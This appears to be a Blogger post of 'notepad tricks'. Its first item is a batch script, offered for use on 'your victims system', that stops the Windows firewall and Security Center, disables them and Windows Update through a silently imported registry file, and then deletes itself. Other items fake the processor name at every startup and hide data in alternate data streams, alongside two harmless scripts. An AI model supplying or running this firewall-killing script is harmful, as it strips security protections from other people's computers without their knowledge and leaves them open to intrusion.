Notepad tricks/Top five notepad tricks

By
1. Code to disable firewall in your or your victims system

Copy this code in Notepad

CODE:
net stop "Security center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0


Save it as *.bat or *.exe and then try....

Note:This trick disables firewall permanently..Beware


2. Change Your Processor to Intel Xeon 8.0 GHZ or any 

Type following lines in notepad

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]

"ProcessorNameString"="Intel Xeon 8.0GHz"
and save as processor.reg and run it.

To see new processor name Click on “My computer” and right click and choose property,
which will show “ Intel Xeon 8.0 GHZ. (It is t...emparory change only)

Note: For permanent changes regedit /s processor.reg in notepad and save as phack.bat
and put both files(processor.reg and phack.bat)

In windows startup folder [ Documents abd settings\all users\start meny\programs\startup ]
which will run whenever the system restarts.

3.CREATE HIDDEN DATA IN NOTEPAD

IN CMD
type
notepad xxx :hidden
("replace xxx with the path of the text file to be create eg D:\)
then system ask to create a new txt file " click yes"
then type any secret datas on the opened text file
then save it
no one can read it by simply opening
TO READ DATA
OPEN CMD
type
notepad xxx :hidden
(then text file with data will be opened)

4. TO DELETE AN AUTO RUN FILE FROM A DRIVE / USB

@echo off
echo
ECHO ENTER THE USB\DRIVE LETTER TO REMOVE AUTORUN
echo
SET /P X=
attrib -h -r -s %X%:\autorun.inf
DEL %X%:\autorun.inf
pause
SAVE IT AS AUTO.BAT
OPEN IT

5. FLASHING LIGHTS

open notepad

write this
Set wshShell =wscript.CreateObject("WScript.Shell")
for i=1 to 25
if i<10 then
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
End if
Next
save it as light.vbs
then open it
u can see the lights of ur keyboard is flashing
Powered by Blogger.